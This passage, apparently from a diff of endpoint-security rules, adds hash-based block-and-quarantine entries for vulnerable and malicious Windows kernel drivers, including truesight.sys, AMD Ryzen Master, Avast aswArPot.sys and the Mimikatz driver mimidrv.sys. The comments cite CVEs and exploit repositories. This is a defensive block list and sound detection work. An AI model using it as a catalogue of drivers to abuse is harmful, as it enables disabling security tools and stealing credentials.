"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491984Z", + "creation_date": "2026-03-23T11:45:31.491986Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491991Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e63fe1bfbbc1b8fade1fd13bac1504a82c5846a8abd9359ce90b6e0fecbbb7aa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18eb6bf7-4b88-5622-9bd5-285a92b073f9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.819140Z", + "creation_date": "2026-03-23T11:45:30.819142Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819148Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ac7cd788581d6f8098b5d438546eb3584c1b08dbe7fd3b1ddc2a7295bd4dd16f", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "18f07e05-d597-5181-8e27-2732a91f055e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832443Z", + "creation_date": "2026-03-23T11:45:30.832445Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832451Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a785bd53993312166463fd39b61d610cb304376d73846318646c54d34896f952", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "190daa73-097a-5f4e-97f5-d5b33f87e3ac", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.980585Z", + "creation_date": "2026-03-23T11:45:29.980587Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.980592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e269b4cb9df863c31ae13012429f67a0f3cd81481025d35ce6531b33b63b5976", + "comment": "Vulnerable Kernel Driver (aka rzpnk.sys) [https://www.loldrivers.io/drivers/1c6e1d3b-f825-4065-9e0c-83386883e40f/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1911593b-bfe5-5daf-9db9-204c3f44a6e8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.473325Z", + "creation_date": "2026-03-23T11:45:31.473329Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.473338Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fef2b46b8a2ac3dd99373b45b3c55ebac2f87cd4b43ca5de2e06cfe88602431d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19147c82-4285-569b-a634-5a13bf016abc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975497Z", + "creation_date": "2026-03-23T11:45:29.975500Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975506Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "45799bfaea64e065a9b0c97f9f10f42c830d26e55fdcb354e39179d0993e9c7d", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19167ee2-9e05-542d-8c61-3ca8a8fa470a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.809417Z", + "creation_date": "2026-03-23T11:45:31.809420Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.809428Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "25291720e0ee3eaa62c5aec72ec920e776e1255cc64a7010c6c62533e391fa40", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "1918a1ed-2664-570e-8969-831b3df24d18", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970176Z", + "creation_date": "2026-03-23T11:45:29.970177Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970183Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2e97fb72237dbbd8981d13a056dd3544c41d802efd129e1ea7e3f655de661b8", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] 
[https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "191bb992-58ad-5bde-9f2b-ff118d2c2f14", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.808838Z", + "creation_date": "2026-03-23T11:45:31.808842Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.808851Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "be14867535e637d30d5778b2a96b6e8d2631046ac34ac7c92fe9936d09c4e062", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "192674a3-134e-5844-a2d3-65f95cfaefb1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.830807Z", + "creation_date": 
"2026-03-23T11:45:30.830809Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.830814Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cbbe48826fae88adb74f5e7e77e1fbe192d9e0f05983d69565e54f9c846e9da3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19365f62-ae05-5f88-a54c-9ea9c4e8940e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836630Z", + "creation_date": "2026-03-23T11:45:30.836633Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836638Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "08d844b1ef804e6f4ebe072ba9f57feba5a063b97f19625a4012bf83b2929ea0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "195ed128-e7a2-5ce9-8199-ec3d788c8c19", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.153648Z", + "creation_date": "2026-03-23T11:45:31.153650Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.153656Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "896b21cb5583cc9b0e32c490bf352dc6ffc2416edec79aeab0616829a13ccaa5", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19656c3f-d006-5dc2-ac09-d62816f75249", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975130Z", + "creation_date": "2026-03-23T11:45:29.975133Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975138Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9b1ac756e35f795dd91adbc841e78db23cb7165280f8d4a01df663128b66d194", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "196b6108-fa27-5bd9-8a45-4add3b144e47", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.146692Z", + "creation_date": "2026-03-23T11:45:32.146694Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.146699Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d51d00127ddd4551fb1eafe14255715014944ad4c60eabb9e568c3ff98ff4a2e", + "comment": "Vulnerable Kernel Driver (aka 8492937_2_Driver.sys) [https://www.loldrivers.io/drivers/c95a796a-a8f6-4cfa-bc42-4936ecb59091/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19978ec1-6c20-5d2b-8a56-0e6291806ce2", + "test_maturity_current_count": 0, + 
"test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.466937Z", + "creation_date": "2026-03-23T11:45:30.466940Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.466956Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b8d3914b796832a576ed0c977db439c8a5d6df5d0608088c39c786ff81bc2f11", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19a714e6-3b01-53cc-ae78-1c5482addd53", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.829708Z", + "creation_date": "2026-03-23T11:45:31.829711Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.829719Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, 
+ "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "560dbf29eb838763cbabcf378cd8e9f12b7b674df8bfbe7a299f1203c1b3e349", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19b7adda-2c0f-5d0a-b70b-a908c47009e5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487649Z", + "creation_date": "2026-03-23T11:45:31.487651Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487657Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "df95701164a0c5725ff99af1bbd0871083c7139a7683f0753eddfd584d84ba79", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "19cbbf30-419d-5429-996b-d634f00387c8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141820Z",
+ "creation_date": "2026-03-23T11:45:31.141822Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141828Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6fa56c310f9214532d074abe3c37b73c483c16dc8680d0e16d5144e49c7ced03",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19dbd962-119b-5630-8dc6-0985d81e6f9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.473143Z",
+ "creation_date": "2026-03-23T11:45:31.473147Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.473156Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b32096444234a6473f797834b61cec443aab2acbffacf0f7dac842e3c7c10825",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19e0fd82-c6d4-5cb2-ae3a-219f024b9428",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.603996Z",
+ "creation_date": "2026-03-23T11:45:29.603998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604003Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d27af8f0bed1e4f4aeb2b20da89d0ffa1b7b5f7f14148cdf09e6444a0aa5bb1b",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19ecd793-8d73-58f3-ae33-27d476eca21b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973965Z",
+ "creation_date": "2026-03-23T11:45:29.973967Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c082514317bf80a2f5129d84a5a55e411a95e32d03a4df1274537704c80e41dd",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19f077e2-2173-555e-8e13-960e42e56206",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.468376Z",
+ "creation_date": "2026-03-23T11:45:30.468380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.468390Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "68ea8d1bfabf37920686a0814c0bf47cbc4527543716fd94c0d3f23382e15081",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19f498f3-b9a7-55ee-bf3b-556a5d4ed3e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984034Z",
+ "creation_date": "2026-03-23T11:45:29.984036Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984042Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7049f3c939efe76a5556c2a2c04386db51daf61d56b679f4868bb0983c996ebb",
+ "comment": "Vulnerable Kernel Driver (aka SysInfo.sys) [https://www.loldrivers.io/drivers/84ccb68d-ce34-4aa2-98d5-7f473c2e1b07/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "19fce74c-69ac-5bd6-8630-2633f7db63fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985467Z",
+ "creation_date": "2026-03-23T11:45:29.985469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985474Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
